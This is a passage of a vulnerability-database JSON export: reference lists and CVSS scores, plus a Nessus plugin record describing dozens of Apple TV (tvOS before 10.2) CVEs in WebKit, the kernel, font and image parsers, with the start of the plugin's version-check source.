"DEBIAN:DSA-3810-1:929EA"]}, {"type": "debiancve", "idList": ["DEBIANCVE:CVE-2016-3619", "DEBIANCVE:CVE-2016-9642", "DEBIANCVE:CVE-2016-9643", "DEBIANCVE:CVE-2017-2367", "DEBIANCVE:CVE-2017-2386", "DEBIANCVE:CVE-2017-2394", "DEBIANCVE:CVE-2017-2395", "DEBIANCVE:CVE-2017-2396", "DEBIANCVE:CVE-2017-2415", "DEBIANCVE:CVE-2017-2445", "DEBIANCVE:CVE-2017-2446", "DEBIANCVE:CVE-2017-2447", "DEBIANCVE:CVE-2017-2454", "DEBIANCVE:CVE-2017-2455", "DEBIANCVE:CVE-2017-2459", "DEBIANCVE:CVE-2017-2460", "DEBIANCVE:CVE-2017-2464", "DEBIANCVE:CVE-2017-2465", "DEBIANCVE:CVE-2017-2466", "DEBIANCVE:CVE-2017-2468", "DEBIANCVE:CVE-2017-2469", "DEBIANCVE:CVE-2017-2470", "DEBIANCVE:CVE-2017-2475", "DEBIANCVE:CVE-2017-2476", "DEBIANCVE:CVE-2017-2481", "DEBIANCVE:CVE-2017-5029"]}, {"type": "exploitdb", "idList": ["EDB-ID:41964"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:8AB0F0E2E7AF18CF22701AEF64A8CB15"]}, {"type": "fedora", "idList": ["FEDORA:0C3AC6087C5C", "FEDORA:E68A1603A526", "FEDORA:E7DA16095B45"]}, {"type": "freebsd", "idList": ["6A177C87-9933-11E7-93F7-D43D7E971A1B", "A505D397-0758-11E7-8D8B-E8E0B747A45A"]}, {"type": "gentoo", "idList": ["GLSA-201701-16", "GLSA-201706-15", "GLSA-201804-01"]}, {"type": "github", "idList": ["GHSA-PF6M-FXPQ-FG8V"]}, {"type": "googleprojectzero", "idList": ["GOOGLEPROJECTZERO:CF565C17EBBFFB26E24003CCAA054CC8"]}, {"type": "ibm", "idList": ["778E9BCBB0C6BA17B28ABCBD1DAB3618758C7342EEF15BA587F9695C5C403BEB"]}, {"type": "kitploit", "idList": ["KITPLOIT:2973941148692546578"]}, {"type": "mageia", "idList": ["MGASA-2017-0109", "MGASA-2017-0111", "MGASA-2017-0125"]}, {"type": "nessus", "idList": ["700032.PRM", "700033.PRM", "700034.PRM", "700035.PRM", "700114.PRM", "APPLETV_10_2.NASL", "APPLE_IOS_103_CHECK.NBIN", "DEBIAN_DLA-693.NASL", "DEBIAN_DLA-866.NASL", "DEBIAN_DSA-3810.NASL", "FEDORA_2017-58CDE32413.NASL", "FEDORA_2017-98BED96D12.NASL", "FEDORA_2017-E83C26A8C9.NASL", "FREEBSD_PKG_6A177C87993311E793F7D43D7E971A1B.NASL", "FREEBSD_PKG_A505D397075811E78D8BE8E0B747A45A.NASL", "GENTOO_GLSA-201701-16.NASL", "GENTOO_GLSA-201706-15.NASL", "GENTOO_GLSA-201804-01.NASL", "GOOGLE_CHROME_57_0_2987_98.NASL", "ITUNES_12_6.NASL", "ITUNES_12_6_BANNER.NASL", "MACOSX_GOOGLE_CHROME_57_0_2987_98.NASL", "MACOSX_SAFARI10_1.NASL", "MACOSX_SECUPD2017-001.NASL", "MACOS_10_12_4.NASL", "OPENSUSE-2017-353.NASL", "OPENSUSE-2017-609.NASL", "PHOTONOS_PHSA-2017-0018.NASL", "REDHAT-RHSA-2017-0499.NASL", "SUSE_SU-2017-1282-1.NASL", "SUSE_SU-2017-1313-1.NASL", "SUSE_SU-2018-3879-1.NASL", "UBUNTU_USN-3236-1.NASL", "UBUNTU_USN-3257-1.NASL", "UBUNTU_USN-3271-1.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310703810", "OPENVAS:1361412562310810586", "OPENVAS:1361412562310810587", "OPENVAS:1361412562310810588", "OPENVAS:1361412562310810724", "OPENVAS:1361412562310810727", "OPENVAS:1361412562310810728", "OPENVAS:1361412562310810983", "OPENVAS:1361412562310810994", "OPENVAS:1361412562310813437", "OPENVAS:1361412562310843118", "OPENVAS:1361412562310843130", "OPENVAS:1361412562310843148", "OPENVAS:1361412562310851525", "OPENVAS:1361412562310872863", "OPENVAS:1361412562310872901", "OPENVAS:1361412562310890693", "OPENVAS:1361412562310890866", "OPENVAS:703810"]}, {"type": "osv", "idList": ["OSV:DLA-693-1", "OSV:DLA-693-2", "OSV:DLA-866-1", "OSV:DSA-3810-1", "OSV:GHSA-PF6M-FXPQ-FG8V"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:141956", "PACKETSTORM:141963", "PACKETSTORM:141964", "PACKETSTORM:141965", "PACKETSTORM:141967", "PACKETSTORM:141968", "PACKETSTORM:141969", "PACKETSTORM:141970", "PACKETSTORM:141971", "PACKETSTORM:141972", "PACKETSTORM:141977", "PACKETSTORM:141980", "PACKETSTORM:142660"]}, {"type": "photon", "idList": ["PHSA-2017-0018", "PHSA-2017-0044"]}, {"type": "redhat", "idList": ["RHSA-2017:0499"]}, {"type": "redhatcve", "idList": ["RH:CVE-2017-5029"]}, {"type": "rubygems", "idList": ["RUBY:NOKOGIRI-2017-5029"]}, {"type": "seebug", "idList": ["SSV:92841", "SSV:92842", "SSV:92880", "SSV:92881", "SSV:92884", "SSV:92885", "SSV:92886", "SSV:92888", "SSV:92889", "SSV:92890", "SSV:92891", "SSV:92893", "SSV:92904", "SSV:92906", "SSV:92907", "SSV:92908", "SSV:92909", "SSV:92910", "SSV:92919", "SSV:92920", "SSV:92921", "SSV:92922", "SSV:92923", "SSV:92924", "SSV:92993", "SSV:93079", "SSV:93150"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2017:0738-1", "OPENSUSE-SU-2017:0740-1"]}, {"type": "talos", "idList": ["TALOS-2017-0296"]}, {"type": "ubuntu", "idList": ["USN-3236-1", "USN-3257-1", "USN-3271-1"]}, {"type": "ubuntucve", "idList": ["UB:CVE-2016-3619", "UB:CVE-2016-9642", "UB:CVE-2016-9643", "UB:CVE-2017-2367", "UB:CVE-2017-2386", "UB:CVE-2017-2390", "UB:CVE-2017-2394", "UB:CVE-2017-2395", "UB:CVE-2017-2396", "UB:CVE-2017-2415", "UB:CVE-2017-2428", "UB:CVE-2017-2445", "UB:CVE-2017-2446", "UB:CVE-2017-2447", "UB:CVE-2017-2454", "UB:CVE-2017-2455", "UB:CVE-2017-2459", "UB:CVE-2017-2460", "UB:CVE-2017-2463", "UB:CVE-2017-2464", "UB:CVE-2017-2465", "UB:CVE-2017-2466", "UB:CVE-2017-2468", "UB:CVE-2017-2469", "UB:CVE-2017-2470", "UB:CVE-2017-2475", "UB:CVE-2017-2476", "UB:CVE-2017-2479", "UB:CVE-2017-2480", "UB:CVE-2017-2481", "UB:CVE-2017-5029"]}, {"type": "zdi", "idList": ["ZDI-17-188", "ZDI-17-189", "ZDI-17-190", "ZDI-17-191", "ZDI-17-241", "ZDI-17-321", "ZDI-17-441"]}, {"type": "zdt", "idList": ["1337DAY-ID-27448", "1337DAY-ID-27449", "1337DAY-ID-27450", "1337DAY-ID-27474", "1337DAY-ID-27495", "1337DAY-ID-27496", "1337DAY-ID-27497", "1337DAY-ID-27498", "1337DAY-ID-27500", "1337DAY-ID-27501", "1337DAY-ID-27502", "1337DAY-ID-27505", "1337DAY-ID-27507", "1337DAY-ID-27508", "1337DAY-ID-27509", "1337DAY-ID-27510", "1337DAY-ID-27511", "1337DAY-ID-27515", "1337DAY-ID-27516", "1337DAY-ID-27570", "1337DAY-ID-27571", "1337DAY-ID-27572", "1337DAY-ID-27573", "1337DAY-ID-27574", "1337DAY-ID-27678", "1337DAY-ID-27721"]}]}, "score": {"value": 1.0, "vector": "NONE"}, "backreferences": {"references": [{"type": "apple", "idList": ["APPLE:20D403FA17FFAFBF6C005DAD59ACB4F6", "APPLE:581D1ADF40E75038A35B5C18CE7EDD03", "APPLE:HT207600", "APPLE:HT207607"]}, {"type": "archlinux", "idList": ["ASA-201703-4", "ASA-201703-5", "ASA-201704-9"]}, {"type": "attackerkb", "idList": ["AKB:857FC1A3-EE6C-45DE-93A8-A4D31D5ED28F"]}, {"type": "avleonov", "idList": ["AVLEONOV:B5CA8049524C96A911991EE8ADF24F64"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2017-0402"]}, {"type": "chrome", "idList": ["GCSA-7294356344306922687"]}, {"type": "cve", "idList": ["CVE-2016-3619", "CVE-2016-9642", "CVE-2016-9643", "CVE-2017-2367", "CVE-2017-2379", "CVE-2017-2386", "CVE-2017-2390", "CVE-2017-2394", "CVE-2017-2395", "CVE-2017-2396", "CVE-2017-2401", "CVE-2017-2406", "CVE-2017-2407", "CVE-2017-2415", "CVE-2017-2416", "CVE-2017-2417", "CVE-2017-2428", "CVE-2017-2430", "CVE-2017-2432", "CVE-2017-2435", "CVE-2017-2439", "CVE-2017-2440", "CVE-2017-2441", "CVE-2017-2444", "CVE-2017-2445", "CVE-2017-2446", "CVE-2017-2447", "CVE-2017-2448", "CVE-2017-2450", "CVE-2017-2451", "CVE-2017-2454", "CVE-2017-2455", "CVE-2017-2456", "CVE-2017-2458", "CVE-2017-2459", "CVE-2017-2460", "CVE-2017-2461", "CVE-2017-2462", "CVE-2017-2463", "CVE-2017-2464", "CVE-2017-2465", "CVE-2017-2466", "CVE-2017-2467", "CVE-2017-2468", "CVE-2017-2469", "CVE-2017-2470", "CVE-2017-2472", "CVE-2017-2473", "CVE-2017-2474", "CVE-2017-2475", "CVE-2017-2476", "CVE-2017-2478", "CVE-2017-2479", "CVE-2017-2480", "CVE-2017-2481", "CVE-2017-2482", "CVE-2017-2483", "CVE-2017-2485", "CVE-2017-2487", "CVE-2017-2490", "CVE-2017-5029"]}, {"type": "debian", "idList": ["DEBIAN:DLA-866-1:4F92E", "DEBIAN:DSA-3810-1:3BFFF"]}, {"type": "debiancve", "idList": ["DEBIANCVE:CVE-2017-5029"]}, {"type": "exploitdb", "idList": ["EDB-ID:41964"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:8AB0F0E2E7AF18CF22701AEF64A8CB15"]}, {"type": "fedora", "idList": ["FEDORA:0C3AC6087C5C", "FEDORA:E7DA16095B45"]}, {"type": "freebsd", "idList": ["A505D397-0758-11E7-8D8B-E8E0B747A45A"]}, {"type": "gentoo", "idList": ["GLSA-201706-15"]}, {"type": "github", "idList": ["GHSA-PF6M-FXPQ-FG8V"]}, {"type": "googleprojectzero", "idList": ["GOOGLEPROJECTZERO:CF565C17EBBFFB26E24003CCAA054CC8"]}, {"type": "kitploit", "idList": ["KITPLOIT:2973941148692546578"]}, {"type": "metasploit", "idList": ["MSF:ILITIES/GENTOO-LINUX-CVE-2017-2446/", "MSF:ILITIES/GENTOO-LINUX-CVE-2017-2464/", "MSF:ILITIES/ORACLE-SOLARIS-CVE-2017-2386/", "MSF:ILITIES/ORACLE-SOLARIS-CVE-2017-2396/", "MSF:ILITIES/ORACLE-SOLARIS-CVE-2017-2445/", "MSF:ILITIES/ORACLE-SOLARIS-CVE-2017-2447/", "MSF:ILITIES/ORACLE-SOLARIS-CVE-2017-2459/", "MSF:ILITIES/ORACLE-SOLARIS-CVE-2017-2460/", "MSF:ILITIES/ORACLE-SOLARIS-CVE-2017-2465/", "MSF:ILITIES/ORACLE-SOLARIS-CVE-2017-2470/", "MSF:ILITIES/ORACLE-SOLARIS-CVE-2017-2475/", "MSF:ILITIES/UBUNTU-CVE-2017-2396/"]}, {"type": "nessus", "idList": ["DEBIAN_DLA-866.NASL", "DEBIAN_DSA-3810.NASL", "FEDORA_2017-58CDE32413.NASL", "FEDORA_2017-E83C26A8C9.NASL", "FREEBSD_PKG_A505D397075811E78D8BE8E0B747A45A.NASL", "GOOGLE_CHROME_57_0_2987_98.NASL", "MACOSX_GOOGLE_CHROME_57_0_2987_98.NASL", "MACOSX_SAFARI10_1.NASL", "MACOSX_SECUPD2017-001.NASL", "OPENSUSE-2017-353.NASL", "REDHAT-RHSA-2017-0499.NASL", "UBUNTU_USN-3236-1.NASL", "UBUNTU_USN-3257-1.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810586", "OPENVAS:1361412562310810587", "OPENVAS:1361412562310810588", "OPENVAS:1361412562310810724", "OPENVAS:1361412562310810727", "OPENVAS:1361412562310810983", "OPENVAS:1361412562310810994", "OPENVAS:1361412562310843118", "OPENVAS:1361412562310843130", "OPENVAS:1361412562310851525", "OPENVAS:703810"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:141956", "PACKETSTORM:141963", "PACKETSTORM:141964", "PACKETSTORM:141965", "PACKETSTORM:141967", "PACKETSTORM:141968", "PACKETSTORM:141969", "PACKETSTORM:141970", "PACKETSTORM:141971", "PACKETSTORM:141972", "PACKETSTORM:141977", "PACKETSTORM:141980"]}, {"type": "photon", "idList": ["PHSA-2017-0018", "PHSA-2017-0044"]}, {"type": "redhat", "idList": ["RHSA-2017:0499"]}, {"type": "redhatcve", "idList": ["RH:CVE-2017-5029"]}, {"type": "seebug", "idList": ["SSV:92841", "SSV:92842", "SSV:92880", "SSV:92881", "SSV:92884", "SSV:92885", "SSV:92886", "SSV:92888", "SSV:92889", "SSV:92890", "SSV:92891", "SSV:92893", "SSV:92904", "SSV:92906", "SSV:92907", "SSV:92908", "SSV:92909", "SSV:92910", "SSV:92919", "SSV:92920", "SSV:92921", "SSV:92922", "SSV:92923", "SSV:92924", "SSV:92993", "SSV:93079", "SSV:93150"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2017:0738-1", "OPENSUSE-SU-2017:0740-1"]}, {"type": "talos", "idList": ["TALOS-2017-0296"]}, {"type": "ubuntu", "idList": ["USN-3236-1"]}, {"type": "ubuntucve", "idList": ["UB:CVE-2016-9642", "UB:CVE-2016-9643", "UB:CVE-2017-2367", "UB:CVE-2017-2386", "UB:CVE-2017-2390", "UB:CVE-2017-2394", "UB:CVE-2017-2395", "UB:CVE-2017-2396", "UB:CVE-2017-2415", "UB:CVE-2017-2428", "UB:CVE-2017-2445", "UB:CVE-2017-2446", "UB:CVE-2017-2447", "UB:CVE-2017-2454", "UB:CVE-2017-2455", "UB:CVE-2017-2459", "UB:CVE-2017-2460", "UB:CVE-2017-2463", "UB:CVE-2017-2464", "UB:CVE-2017-2465", "UB:CVE-2017-2466", "UB:CVE-2017-2468", "UB:CVE-2017-2469", "UB:CVE-2017-2470", "UB:CVE-2017-2475", "UB:CVE-2017-2476", "UB:CVE-2017-2479", "UB:CVE-2017-2480", "UB:CVE-2017-2481", "UB:CVE-2017-5029"]}, {"type": "zdi", "idList": ["ZDI-17-188", "ZDI-17-189", "ZDI-17-190", "ZDI-17-191", "ZDI-17-241", "ZDI-17-321"]}, {"type": "zdt", "idList": ["1337DAY-ID-27474", "1337DAY-ID-27721"]}]}, "exploitation": null, "vulnersScore": 1.0}, "affectedSoftware": [{"name": "tvos", "operator": "lt", "version": "10.2"}], "scheme": null, "immutableFields": [], "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": true}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 1.8, "impactScore": 5.9}, "_state": {"dependencies": 1659998956, "score": 1659964867}, "_internal": {"score_hash": "c9c27c03c3a10e1c5736b228c5ba8dba"}}
{"nessus": [{"lastseen": "2021-08-19T12:37:22", "description": "According to its banner, the version of Apple TV on the remote device is prior to 10.2. It is, therefore, affected by multiple vulnerabilities :\n\n - An out-of-bounds read error exists in LibTIFF in the DumpModeEncode() function within file tif_dumpmode.c.\n An unauthenticated, remote attacker can exploit this to crash a process linked against the library or disclose memory contents. (CVE-2016-3619)\n\n - An out-of-bounds read error exists in WebKit when handling certain JavaScript code. An unauthenticated, remote attacker can exploit this to cause a denial of service condition or the disclosure of memory contents.\n (CVE-2016-9642)\n\n - A denial of service vulnerability exists in WebKit when handling certain regular expressions. An unauthenticated, remote attacker can exploit this, via a specially crafted web page, to exhaust available memory resources. (CVE-2016-9643)\n\n - An information disclosure vulnerability exists in WebKit when handling page loading due to improper validation of certain input. An unauthenticated, remote attacker can exploit this to disclose data cross-origin.\n (CVE-2017-2367)\n\n - A buffer overflow condition exists in the Carbon component when handling specially crafted DFONT files due to improper validation of certain input. An unauthenticated, remote attacker can exploit this, via a specially crafted file, to cause a denial of service condition or the execution of arbitrary code.\n (CVE-2017-2379)\n\n - An information disclosure vulnerability exists in WebKit when handling unspecified exceptions. An unauthenticated, remote attacker can exploit this, via specially crafted web content, to disclose data cross-origin. (CVE-2017-2386)\n\n - A flaw exists in the libarchive component due to the insecure creation of temporary files. A local attacker can exploit this, by using a symlink attack against an unspecified file, to cause unexpected changes to be made to file system permissions. (CVE-2017-2390)\n\n - Multiple memory corruption issues exist in WebKit that allow an unauthenticated, remote attacker to cause a denial of service condition or the execution of arbitrary code. (CVE-2017-2394, CVE-2017-2395, CVE-2017-2396, CVE-2017-2454, CVE-2017-2455, CVE-2017-2459, CVE-2017-2460, CVE-2017-2464, CVE-2017-2465, CVE-2017-2466, CVE-2017-2468, CVE-2017-2469, CVE-2017-2470, CVE-2017-2476)\n\n - A memory corruption issue exists in the Kernel component due to improper validation of certain input. An unauthenticated, remote attacker can exploit this, by convincing a user to run a specially crafted application, to cause a denial of service condition or the execution or arbitrary code. (CVE-2017-2401)\n\n - Multiple memory corruption issues exist in the FontParser component when handling font files due to improper validation of certain input. An unauthenticated, remote attacker can exploit these to cause a denial condition or the execution of arbitrary code. (CVE-2017-2406, CVE-2017-2407, CVE-2017-2487)\n\n - An unspecified type confusion error exists in WebKit that allows an unauthenticated, remote attacker to execute arbitrary code by using specially crafted web content. (CVE-2017-2415)\n\n - A memory corruption issue exists in the ImageIO component, specifically in the GIFReadPlugin::init() function, when handling image files due to improper validation of certain input. An unauthenticated, remote attacker can exploit this, via a specially crafted image file, to cause a denial of service condition or the execution of arbitrary code. (CVE-2017-2416)\n\n - An infinite recursion condition exists in the CoreGraphics component when handling image files. An unauthenticated, remote can exploit this, via a specially crafted image file, to cause a denial of service condition. (CVE-2017-2417)\n\n - An unspecified flaw exists related to nghttp2 and LibreSSL. An unauthenticated, remote attacker can exploit this, by convincing a user to access a malicious HTTP/2 server, to have an unspecified impact on confidentiality, integrity, and availability.\n (CVE-2017-2428)\n\n - A type confusion error exists in the Audio component when parsing specially crafted M4A audio files due to improper validation of certain input. An unauthenticated, remote attacker can exploit this, via a specially crafted file, to cause a denial of service condition or the execution of arbitrary code.\n (CVE-2017-2430)\n\n - An integer overflow condition exists in the ImageIO component when handling JPEG files due to improper validation of certain input. An unauthenticated, remote attacker can exploit this, via a specially crafted file, to cause a denial of service condition or the execution of arbitrary code. (CVE-2017-2432)\n\n - A memory corruption issue exists in the CoreText component when handling font files due to improper validation of certain input. An unauthenticated, remote attacker can exploit this, via a specially crafted file, to cause a denial of service condition or the execution of arbitrary code. (CVE-2017-2435)\n\n - An out-of-bounds read error exists in the FontParser component when handling font files. An unauthenticated, remote attacker can exploit this, via a specially crafted file, to disclose process memory.\n (CVE-2017-2439)\n\n - An integer overflow condition exists in the Kernel component due to improper validation of certain input.\n An unauthenticated, remote attacker can exploit this, by convincing a user to run a specially crafted application, to execute arbitrary code with kernel-level privileges. (CVE-2017-2440)\n\n - A use-after-free error exists in libc++abi when demangling C++ applications. An unauthenticated, remote attacker can exploit this, by convincing a user to run a specially crafted application, to execute arbitrary code. (CVE-2017-2441)\n\n - A memory corruption issue exists in WebKit within the CoreGraphics component due to improper validation of certain input. An unauthenticated, remote attacker can exploit this, via specially crafted web content, to cause a denial of service condition or the execution of arbitrary code. (CVE-2017-2444)\n\n - A universal cross-site scripting (XSS) vulnerability exists in WebKit when handling frame objects due to improper validation of certain input. An unauthenticated, remote attacker can exploit this, via specially crafted web content, to execute arbitrary script code in a user's browser session. (CVE-2017-2445)\n\n - A flaw exists in WebKit due to non-strict mode functions that are called from built-in strict mode scripts not being properly restricted from calling sensitive native functions. An unauthenticated, remote attacker can exploit this, via specially crafted web content, to execute arbitrary code. (CVE-2017-2446)\n\n - An out-of-bounds read error exists in WebKit when handling the bound arguments array of a bound function.\n An unauthenticated, remote attacker can exploit this, via specially crafted web content, to disclose memory contents. (CVE-2017-2447)\n\n - An unspecified flaw exists in the Security component due to improper validation of OTR packets under certain conditions. A man-in-the-middle attacker can exploit this to disclose and optionally manipulate transmitted data by spoofing the TLS/SSL server via a packet that appears to be valid. (CVE-2017-2448)\n\n - An out-of-bounds read error exists in CoreText component when handling font files. An unauthenticated, remote attacker can exploit this, via a specially crafted file, to disclose process memory. (CVE-2017-2450)\n\n - A buffer overflow condition exists in the Security component due to improper validation of certain input.\n An unauthenticated, remote attacker can exploit this, by convincing a user to run a specially crafted application, to execute arbitrary code with root root privileges. (CVE-2017-2451)\n\n - A race condition exists in the Kernel component when handling memory using the 'mach_msg' system call. An unauthenticated, remote attacker can exploit this, by convincing a user to run a specially crafted application, to cause a heap-based buffer overflow, resulting in a denial of service condition or the execution of arbitrary code with root privileges.\n CVE-2017-2456)\n\n - An buffer overflow condition exists in the Keyboards component due to improper validation of certain input.\n An unauthenticated, remote attacker can exploit this, by convincing a user to run a specially crafted application, to cause a denial of service condition or the execution of arbitrary code. (CVE-2017-2458)\n\n - A denial of service vulnerability exists in the CoreText component when handling specially crafted text messages due to improper validation of certain input. An unauthenticated, remote attacker can exploit this to exhaust available resources on the system.\n (CVE-2017-2461)\n\n - A heap buffer overflow condition exists in the Audio component when parsing specially crafted M4A audio files due to improper validation of certain input. An unauthenticated, remote attacker can exploit this, via a specially crafted file, to execute arbitrary code.\n (CVE-2017-2462)\n\n - An memory corruption issue exists in the ImageIO component when handling specially crafted files due to improper validation of certain input. An unauthenticated, remote attacker can exploit this, via a specially crafted file, to cause a denial of service condition or the execution of arbitrary code.\n (CVE-2017-2467)\n\n - A use-after-free error exists in the Kernel component in the XNU port actions extension due to improper handling of port references in error cases. An local attacker can exploit this to deference already freed memory, resulting in the execution of arbitrary code with kernel-level privileges. (CVE-2017-2472)\n\n - A signedness error exists in the Kernel component in the SIOCSIFORDER IOCTL due to improper validation of certain input. A local attacker can exploit this to cause an out-of-bounds read and memory corruption, resulting in a denial of service condition or the execution of arbitrary code with kernel-level privileges.\n (CVE-2017-2473)\n\n - A off-by-one overflow condition exists in the Kernel component in the SIOCSIFORDER IOCTL due to improper validation of certain input. A local attacker can exploit this to cause a heap-based buffer overflow, resulting in the execution of arbitrary code with kernel-level privileges. (CVE-2017-2474)\n\n - A universal cross-site scripting (XSS) vulnerability exists in WebKit when handling frames due to improper validation of certain input. An unauthenticated, remote attacker can exploit this, via specially crafted web content, to execute arbitrary script code in a user's browser session. (CVE-2017-2475)\n\n - A race condition exists in the Kernel component in the necp_open() function when closing files descriptors due to improper handling of proc_fd locks. A local attacker can exploit this to dereference already freed memory, resulting in the execution of arbitrary code with kernel-level privileges. (CVE-2017-2478)\n\n - A use-after-free error exists in WebKit when handling ElementData objects. An unauthenticated, remote attacker can exploit this, via specially crafted web content, to dereference already freed memory, resulting in the execution of arbitrary code. (CVE-2017-2481)\n\n - A heap buffer overflow condition exists in the Kernel component within the Berkeley Packet Filter (BPF) BIOCSBLEN IOCTL due to improper validation of certain input when reattaching to an interface. A local attacker can exploit this to cause a denial of service condition or the execution of arbitrary code with kernel-level privileges. (CVE-2017-2482)\n\n - An off-by-one error exists in the Kernel component, specifically in the audit_pipe_open() function, when handling auditpipe devices due to improper validation of certain input. A local attacker can exploit this to corrupt memory, resulting in a denial of service condition or the execution of arbitrary code with kernel-level privileges. (CVE-2017-2483)\n\n - An unspecified memory corruption issue exists in the Security component when parsing X.509 certificates due to improper validation of certain input. An unauthenticated, remote attacker can exploit this to cause a denial of service condition or the execution of arbitrary code. (CVE-2017-2485)\n\n - A double-free error exists in the Kernel component due to FSEVENTS_DEVICE_FILTER_64 IOCTL not properly locking devices. A local attacker can exploit this to corrupt memory, resulting in the execution of arbitrary code with elevated privileges. (CVE-2017-2490)\n\n - A use-after-free error exists in JavaScriptCore when handling the String.replace() method. An unauthenticated, remote attacker can exploit this to deference already freed memory, resulting in the execution of arbitrary code. (CVE-2017-2491)\n\n - A universal cross-site scripting (XSS) vulnerability exists in JavaScriptCore due to an unspecified prototype flaw. An unauthenticated, remote attacker can exploit this, via a specially crafted web page, to execute arbitrary code in a user's browser session.\n (CVE-2017-2492)\n\nNote that only 4th generation models are affected by these vulnerabilities.", "cvss3": {"score": 7.8, "vector": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2017-04-10T00:00:00", "type": "nessus", "title": "Apple TV < 10.2 Multiple Vulnerabilities", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-3619", "CVE-2016-9642", "CVE-2016-9643", "CVE-2017-2367", "CVE-2017-2379", "CVE-2017-2386", "CVE-2017-2390", "CVE-2017-2394", "CVE-2017-2395", "CVE-2017-2396", "CVE-2017-2401", "CVE-2017-2406", "CVE-2017-2407", "CVE-2017-2415", "CVE-2017-2416", "CVE-2017-2417", "CVE-2017-2428", "CVE-2017-2430", "CVE-2017-2432", "CVE-2017-2435", "CVE-2017-2439", "CVE-2017-2440", "CVE-2017-2441", "CVE-2017-2444", "CVE-2017-2445", "CVE-2017-2446", "CVE-2017-2447", "CVE-2017-2448", "CVE-2017-2450", "CVE-2017-2451", "CVE-2017-2454", "CVE-2017-2455", "CVE-2017-2456", "CVE-2017-2458", "CVE-2017-2459", "CVE-2017-2460", "CVE-2017-2461", "CVE-2017-2462", "CVE-2017-2464", "CVE-2017-2465", "CVE-2017-2466", "CVE-2017-2467", "CVE-2017-2468", "CVE-2017-2469", "CVE-2017-2470", "CVE-2017-2472", "CVE-2017-2473", "CVE-2017-2474", "CVE-2017-2475", "CVE-2017-2476", "CVE-2017-2478", "CVE-2017-2481", "CVE-2017-2482", "CVE-2017-2483", "CVE-2017-2485", "CVE-2017-2487", "CVE-2017-2490", "CVE-2017-2491", "CVE-2017-2492"], "modified": "2019-11-13T00:00:00", "cpe": ["cpe:/a:apple:apple_tv"], "id": "APPLETV_10_2.NASL", "href": "https://www.tenable.com/plugins/nessus/99264", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(99264);\n script_version(\"1.9\");\n script_cvs_date(\"Date: 2019/11/13\");\n\n script_cve_id(\n \"CVE-2016-3619\",\n \"CVE-2016-9642\",\n \"CVE-2016-9643\",\n \"CVE-2017-2367\",\n \"CVE-2017-2379\",\n \"CVE-2017-2386\",\n \"CVE-2017-2390\",\n \"CVE-2017-2394\",\n \"CVE-2017-2395\",\n \"CVE-2017-2396\",\n \"CVE-2017-2401\",\n \"CVE-2017-2406\",\n \"CVE-2017-2407\",\n \"CVE-2017-2415\",\n \"CVE-2017-2416\",\n \"CVE-2017-2417\",\n \"CVE-2017-2428\",\n \"CVE-2017-2430\",\n \"CVE-2017-2432\",\n \"CVE-2017-2435\",\n \"CVE-2017-2439\",\n \"CVE-2017-2440\",\n \"CVE-2017-2441\",\n \"CVE-2017-2444\",\n \"CVE-2017-2445\",\n \"CVE-2017-2446\",\n \"CVE-2017-2447\",\n \"CVE-2017-2448\",\n \"CVE-2017-2450\",\n \"CVE-2017-2451\",\n \"CVE-2017-2454\",\n \"CVE-2017-2455\",\n \"CVE-2017-2456\",\n \"CVE-2017-2458\",\n \"CVE-2017-2459\",\n \"CVE-2017-2460\",\n \"CVE-2017-2461\",\n \"CVE-2017-2462\",\n \"CVE-2017-2464\",\n \"CVE-2017-2465\",\n \"CVE-2017-2466\",\n \"CVE-2017-2467\",\n \"CVE-2017-2468\",\n \"CVE-2017-2469\",\n \"CVE-2017-2470\",\n \"CVE-2017-2472\",\n \"CVE-2017-2473\",\n \"CVE-2017-2474\",\n \"CVE-2017-2475\",\n \"CVE-2017-2476\",\n \"CVE-2017-2478\",\n \"CVE-2017-2481\",\n \"CVE-2017-2482\",\n \"CVE-2017-2483\",\n \"CVE-2017-2485\",\n \"CVE-2017-2487\",\n \"CVE-2017-2490\",\n \"CVE-2017-2491\",\n \"CVE-2017-2492\"\n );\n script_bugtraq_id(\n 85919,\n 94554,\n 94559,\n 97130,\n 97131,\n 97132,\n 97134,\n 97137,\n 97143,\n 97146,\n 97301,\n 98316\n );\n script_xref(name:\"APPLE-SA\", value:\"APPLE-SA-2017-03-27-6\");\n\n script_name(english:\"Apple TV < 10.2 Multiple Vulnerabilities\");\n script_summary(english:\"Checks the build number.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Apple TV device is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its banner, the version of Apple TV on the remote device\nis prior to 10.2. It is, therefore, affected by multiple\nvulnerabilities :\n\n - An out-of-bounds read error exists in LibTIFF in the\n DumpModeEncode() function within file tif_dumpmode.c.\n An unauthenticated, remote attacker can exploit this\n to crash a process linked against the library or\n disclose memory contents. (CVE-2016-3619)\n\n - An out-of-bounds read error exists in WebKit when\n handling certain JavaScript code. An unauthenticated,\n remote 